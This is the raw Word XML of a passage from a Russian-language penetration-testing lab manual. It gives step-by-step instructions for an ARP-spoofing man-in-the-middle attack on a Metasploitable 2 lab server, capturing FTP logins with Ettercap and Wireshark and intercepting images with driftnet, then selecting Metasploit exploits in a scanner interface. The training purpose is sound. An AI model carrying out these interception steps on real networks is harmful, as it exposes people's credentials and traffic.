                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4298470" cy="198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1411FD" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Шаг 3. Пр</w:t>
      </w:r>
      <w:r w:rsidR="001411FD">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">оверка наличия </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001411FD">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>бэкдора</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001411FD">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001411FD">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001411FD">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US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AF87677" wp14:editId="78E55ACA">
            <wp:extent cx="5940115" cy="6108700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="26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10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1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc107507610"/>
      <w:bookmarkStart w:id="20" w:name="_Toc107513729"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Раздел 4. Эксплуатация уязвимостей</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="005B2EC9" w:rsidP="00EF49CB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc107507611"/>
      <w:bookmarkStart w:id="22" w:name="_Toc107513730"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Лабораторная работа № 4.1.</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t>Проведение MITM-атаки с использованием ARP-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>спуфинга</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
      <w:proofErr w:type="spellEnd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перехватывать данные в современных компьютерных сетях.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Задание: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п</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ровести атаку ARP-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>спуфинга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между </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Lubuntu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(клиент) и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploitable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2 (сервер);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в</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ести наблюдение за ARP-таблицами на цели до и после атаки;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п</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ерехватить FTP-сессию с помощью </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ettercap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и перехватить передаваемые изображения с помощью утилиты </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>driftnet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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347A12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</w:t>
      </w:r>
      <w:r w:rsidR="00347A12">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Включение</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> на машине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Сканер-ВС</w:t>
      </w:r>
      <w:r w:rsidR="00401AC4">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00347A12">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> форвард IP-пакетов: «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>echo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 &gt; /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>proc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sys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net</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/ipv4/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ip_forward</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00347A12">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>».</w:t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2. </w:t>
      </w:r>
      <w:r w:rsidR="00347A12">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Запуск </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ARP-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>spoofing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00347A12">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B2EC9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51A6FEB" wp14:editId="024447AB">
            <wp:extent cx="5810286" cy="2951698"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="346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8083" cy="2955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B2EC9" w:rsidRDefault="005B2EC9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</w:p>
    <w:p w:rsidR="00347A12" w:rsidRDefault="00347A12" w:rsidP="00347A12">
      <w:r w:rsidRPr="00347A12">
        <w:t>Шаг 2. Запуск «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>Wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00347A12">
        <w:t xml:space="preserve">» и </w:t>
      </w:r>
      <w:r w:rsidR="001411FD">
        <w:t>перехват</w:t>
      </w:r>
      <w:r w:rsidRPr="00347A12">
        <w:t xml:space="preserve"> сессии FTP-авторизации (Главное меню → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>Сниффинг</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00347A12">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>спуфинг</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00347A12">
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00347A12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347A12">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB"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1E1ED92" wp14:editId="4363CDD9">
            <wp:extent cx="5071534" cy="3714602"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="25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9651" cy="3713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sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          </w:rPr>
          <w:tag w:val="goog_rdk_5"/>
          <w:id w:val="-168404848"/>
        </w:sdtPr>
        <w:sdtContent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Шаг 3. </w:t>
          </w:r>
          <w:r w:rsidR="00347A12">
            <w:rPr>
              <w:rFonts w:ascii="Gungsuh" w:eastAsia="Gungsuh" w:hAnsi="Gungsuh" w:cs="Gungsuh"/>
              <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>Запуск</w:t>
          </w:r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</w:t>
          </w:r>
          <w:r w:rsidR="00401AC4">
            <w:rPr>
              <w:rFonts w:ascii="Gungsuh" w:eastAsia="Gungsuh" w:hAnsi="Gungsuh" w:cs="Gungsuh"/>
              <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>«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follow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TCP-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stream</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd"/>
          <w:r w:rsidR="00401AC4">
            <w:rPr>
              <w:rFonts w:ascii="Gungsuh" w:eastAsia="Gungsuh" w:hAnsi="Gungsuh" w:cs="Gungsuh"/>
              <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>»</w:t>
          </w:r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(правый клик по TCP-пакету в окне сканирования → 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Follow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TCP-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stream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).</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt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A11A112" wp14:editId="015CF1DB">
            <wp:extent cx="5938202" cy="2870200"/>
            <wp:effectExtent l="0" t="0" r="5715" b="6350"/>
            <wp:docPr id="31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 rotWithShape="1">
                    <a:blip r:embed="rId68"/>
                    <a:srcRect b="32223"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="287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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="39CEA55E" wp14:editId="47AADE4A">
            <wp:extent cx="3175000" cy="3369910"/>
            <wp:effectExtent l="0" t="0" r="6350" b="2540"/>
            <wp:docPr id="26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 r="865"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3178654" cy="337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3. </w:t>
      </w:r>
      <w:r w:rsidR="00347A12">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Проверить </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ARP-таблицы на цели до проведения ARP-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>спуфинга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215013F" wp14:editId="4ADD8A77">
            <wp:extent cx="5940115" cy="711200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="369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После проведения атаки.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CD0C2E7" wp14:editId="7FD1ED55">
            <wp:extent cx="5940115" cy="673100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="324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4. </w:t>
      </w:r>
      <w:r w:rsidR="00347A12">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Запуск</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> из консоли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driftnet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для перехвата изображений, передаваемых между узлами:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00347A12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14AD2B4" wp14:editId="7E81EACD">
            <wp:extent cx="2889534" cy="2317170"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6985"/>
            <wp:docPr id="24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731" cy="232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b w:val="0"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc107507612"/>
      <w:bookmarkStart w:id="24" w:name="_Toc107513731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4.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Подбор </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>эксплойтов</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> с помощью веб-интерфейса </w:t>
      </w:r>
      <w:r w:rsidR="00401AC4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сканер-ВС</w:t>
      </w:r>
      <w:r w:rsidR="00401AC4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:bookmarkEnd w:id="24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использовать веб-интерфейс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Сканер-ВС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для подбора </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>эксплойтов</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> для последующей эксплуатации в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploit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Задание: </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">с помощью веб-интерфейса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Сканер-ВС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(раздел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Эксплуатация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) подобрать </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>эксплойты</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> к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Перейти в раздел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Эксплуатация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во вкладке проекта, выбрать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 xml:space="preserve">Поиск </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>эксплоитов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mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="2A182A88" wp14:editId="7C247E4A">
                <wp:extent cx="5940115" cy="4038600"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="232" name="Группа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115" cy="4038600"/>
                          <a:chOff x="152400" y="152400"/>
                          <a:chExt cx="7315201" cy="4962251"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture"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7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1" cy="4962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Прямоугольник 2"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2225225" y="1382175"/>
                            <a:ext cx="901800" cy="2451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01AC4" w:rsidRDefault="00401AC4" w:rsidP="00EF49C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Прямоугольник 3"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="303875" y="1646850"/>
                            <a:ext cx="1607700" cy="5883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01AC4" w:rsidRDefault="00401AC4" w:rsidP="00EF49C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32" o:spid="_x0000_s1032" style="width:467.75pt;height:318pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordorigin="1524,1524" coordsize="73152,49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96nl4QMAANoKAAAOAAAAZHJzL2Uyb0RvYy54bWzkVs1u4zYQvhfoOxC6&#10;b/Rjy3aEOIvFZh0ssG2NbPsANEVJRCWSJem/nhbotUAPfYC+QoFeiv7svoLyRjtDSXY22SBtChQF&#10;GscyhxwNv5n5Zsizp7umJhturFByHsQnUUC4ZCoXspwHX325eDILiHVU5rRWks+DPbfB0/NPPznb&#10;6ownqlJ1zg0BI9JmWz0PKud0FoaWVbyh9kRpLmGxUKahDkRThrmhW7De1GESRZNwq0yujWLcWpi9&#10;6BaDc2+/KDhzXxSF5Y7U8wCwOf80/rnCZ3h+RrPSUF0J1sOgj0DRUCFh04OpC+ooWRtxx1QjmFFW&#10;Fe6EqSZURSEY9z6AN3F0y5tLo9ba+1Jm21IfwgShvRWnR5tln2+Whoh8HiSjJCCSNpCk9sfrN9ff&#10;te/g8zPBeYjSVpcZKF8a/VovTT9RdhI6vitMg7/gEtn5+O4P8eU7RxhMpqfjKI7TgDBYG0ej2STq&#10;M8AqSBO+F6fJGCYJKPRDnyFWvehtTEcwH8W9jdNJkqQx4gsHCCEiPQDTgmXw7UMHozuhe5hi8JZb&#10;Gx70Rpq/ZKOh5uu1fgJZ1tSJlaiF23vGQj4RlNwsBVuaTjhmYTrk4HVFNSdTdA3VUQP1iTa84OaK&#10;12B1w6+4Fd9CxnwYwzt2V7XQC1HXmBgc9x4A/2/x5yNB6Lh5odi64dJ1xWb8tkraSmgbEJPxZsWB&#10;O+ZlHnv601pX9DOVL8SuywnuirtbZ7hjFQ4LAHQFhdkpHBY8+iNg9MUC0/CNW9y6hyMDyx5kCM20&#10;se6SqwaiaaElGEDTwd+8sj2uQQX3lwqDCHhpVssPJoB1OOOxd2j9EMBjxUBLs0PMQboT9b9VtZ4Q&#10;gBLNHvlyrNmfoGZ/aP9o30Ll/tK+bX+//r79s/21/Y309etfOxSvvS+6CVQU/HclOJol8TRFEtJs&#10;iO9pFM+wRLGIk3EadzV8qL9/Fl2yBaOzFPYkjMJ5UADPYdhoYJmVpc+SVbUAhnW0tqZcPa8N2VDo&#10;8ItFBH99O/hADdN5QW3V6fmlzitosTL3/lWc5i9kTtxeQ0VJOK4CRGObgNQcDjcYeD1HRf2w3sAM&#10;TFfHDBy53Wrnu+0YbeHMSuV7KGur2UIAxlfUuiU1cAZBi9vCuQT7frOm2H3qlxIodBqPMTnupmBu&#10;CqubApWsUlDuzJmAdMJz54+/jsbP1k4VwlP+CAb4jAJw918i8Whoeu39JB4NAQPuP0ziERwuyCE8&#10;RibjySztz5mBw/Ekmk4HEqez2ejAmqHXDPX/mBbxfyGxbwxH3vxnSeyvBHCB8reE/rKHN7Sbsif9&#10;8Up6/h4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NepbbdAAAABQEAAA8AAABk&#10;cnMvZG93bnJldi54bWxMj0FLw0AQhe+C/2EZwZvdxJBgYzalFPVUBFtBeptmp0lodjZkt0n67129&#10;6GXg8R7vfVOsZtOJkQbXWlYQLyIQxJXVLdcKPvevD08gnEfW2FkmBVdysCpvbwrMtZ34g8adr0Uo&#10;YZejgsb7PpfSVQ0ZdAvbEwfvZAeDPsihlnrAKZSbTj5GUSYNthwWGuxp01B13l2MgrcJp3USv4zb&#10;82lzPezT969tTErd383rZxCeZv8Xhh/8gA5lYDraC2snOgXhEf97g7dM0hTEUUGWZBHIspD/6ctv&#10;AAAA//8DAFBLAwQKAAAAAAAAACEAFVjEWJmwAACZsAAAFAAAAGRycy9tZWRpYS9pbWFnZTEucG5n&#10;iVBORw0KGgoAAAANSUhEUgAAAx8AAAIeCAYAAADaj7K0AAAAAXNSR0IArs4c6QAAAARnQU1BAACx&#10;jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAALAuSURBVHhe7N0LYFPl3T/wb5ukTe8tLdBCgUo7&#10;qIDc5A4KioogKt7ROWU6lambbm6OOd//dHN7cXNOnW7o1KHzVeaVeQMUFBSQOwUptthigQIFWnpv&#10;0yZp/8/v5KRN06RJSxvS8v3gscm55ZznOSd5fud5nnNCzj333MbS0lIQERERERF1JS34OHr0qP6W&#10;iIiIiIioa4QkJyc36q+JiIiIiIi6TEhR0dEuCT4aGxu1oaGhQQ3qb6P8bUCIPo2opwkJCYEc2aGh&#10;oQgNUUNoiPZaxstAREREdKbr9OBDAgu73Q6bGmpra1FZWYOqmlrUWethszXArgcgRD2NnEgGFWwY&#10;jaEIN4UhOjICMTGRiIiIgNFggEENDEKIiIjoTNZpwYcz6LBarThZVoHik2Ww2hvQOyEO8fGxiIww&#10;I8IcoQpgUjgz6ksR9Rw2m02dAw2otdSiptaCMnUenCgth0kd80m94tFLnQcmk4lBCBEREZ2xOiX4&#10;kMDDarWhtKICx0+UIAShOGtQKhJVgUtIcytHEyz5qE6taCEKMtLUytHMSppciZLSMnxXUKiO/Ab0&#10;6Z2IhFgJQowMQIiIiOiMc8rBhwQWNpsdhUeP4XhxKTKHDEZKnyTtKrBMIzrTSRAitX1HjxcjZ99+&#10;9FZB+YD+yWqcoSlAISIiIjoTnFLw4azxOHT4KErLK3Hu6OEIDwvTml8RUUvS3Kquvh7bs7KREBej&#10;ApAU1oAQERHRGeWULrtKkHGi5CSOl5RjrAo8TEYjAw8iL+TckHNEzhU5Z+Tc4flCREREZ5IOBx/S&#10;pEo6lxedKMbwzAyEqUKV1IQQkXdyjsi5MmJYhnbuyDnE5olERER0puhwsytpblVw6AgsdVaMHXm2&#10;KkB5voKblNRbf9UxxcUn9FdEPUdoqAFf7/0W